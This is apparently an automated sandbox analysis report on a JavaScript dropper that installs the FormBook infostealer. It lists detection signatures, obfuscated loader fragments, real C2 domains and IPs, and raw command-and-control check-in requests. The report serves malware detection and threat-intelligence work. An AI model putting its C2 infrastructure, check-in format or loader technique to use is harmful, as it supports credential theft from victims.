Windows Analysis Report
CIQ-PO162688.js

Overview

General Information

Sample Name: CIQ-PO162688.js
Analysis ID: 635313
MD5: ebcb99f17238dde1ca4c12316ebce4a7
SHA1: 1662814aa8638312144d7be033875b2365e89696
SHA256: e873129006fb7f83c9bec9516fd3ce2e3737f79df1458606445e61926a844f4a
Tags: jsVjw0rm
Infos:

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (surpress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Multi AV Scanner detection for submitted file
Source: CIQ-PO162688.js Virustotal: Detection: 25% Perma Link
Source: CIQ-PO162688.js ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Antivirus detection for URL or domain
Source: http://www.brandpay.xyz/np8s/ Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/Vreod Avira URL Cloud: Label: malware
Source: http://www.brandpay.xyz/np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl Avira URL Cloud: Label: phishing
Source: http://www.tentanguang.online/np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl Avira URL Cloud: Label: phishing
Source: http://www.waermark.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiUkYirr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenter7 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/UZXh0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrewz Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrezjB Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre8 Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM7d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo& Avira URL Cloud: Label: malware
Source: http://www.gabefancher.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMP Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreem Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreSE Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreageen-usWScript.Quit Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreineer Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vret Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vren Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreagent Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrej Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.waermark.com/np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh Avira URL Cloud: Label: malware
Source: http://www.tentanguang.online/np8s/ Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/Vred Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vree5 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreX Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMjdcXHZi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreR Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM% Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreU Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreP Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreL Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreH Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreA% Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreN_5 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Metadefender: Detection: 48% Perma Link
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.3.wscript.exe.18737493000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.fc0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bin.exe.fc0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.bin.exe.7bdb30.0.unpack Avira: Label: TR/Patched.Gen
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1660 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1659 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: CIQ-PO162688.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO162688.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",466', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO162688.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",466', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
JavaScript source code contains call to eval containing suspicious API calls
Source: CIQ-PO162688.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.172 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Network Connect: 23.19.171.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Domain query: www.getbusinesscreditandfunding.com
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.vitality-patients.online
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.harmlett.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.waermark.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 68.66.224.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tentanguang.online
Source: C:\Windows\explorer.exe Domain query: www.angelmatic.net
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.siberup.xyz
Source: C:\Windows\explorer.exe DNS query: www.brandpay.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1BJBbWkp2bvyU0/jbw==&Eh=mhUxl HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w==&Eh=mhUxl HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl HTTP/1.1Host: www.tentanguang.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpo9ngwjPS7HOCJSNA==&Eh=mhUxl HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDd38wf67F/cvJLwRDA==&Eh=mhUxl HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&Eh=mhUxl HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
